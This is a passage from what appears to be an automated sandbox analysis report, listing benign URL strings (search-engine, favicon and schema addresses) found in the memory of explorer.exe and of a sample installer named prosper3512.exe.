          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2095586228.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://msk.afisha.ru/
          Source: prosper3512.exe, prosper3512.exe, 00000004.00000002.2086274371.0000000000409000.00000004.00020000.sdmp, prosper3512.exe, 00000005.00000000.2081643201.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: prosper3512.exe, 00000004.00000002.2086274371.0000000000409000.00000004.00020000.sdmp, prosper3512.exe, 00000005.00000000.2081643201.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://sads.myspace.com/
          Source: prosper3512.exe, 00000004.00000002.2087395061.00000000021D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2090043986.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2098155227.0000000004F30000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2097141006.0000000004297000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2089277901.0000000000260000.00000004.00000020.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000006.00000000.2097698723.0000000004B50000.00000002.00000001.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2096162497.0000000003E27000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: prosper3512.exe, 00000004.00000002.2087395061.00000000021D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2090043986.0000000001C70000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2110217077.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
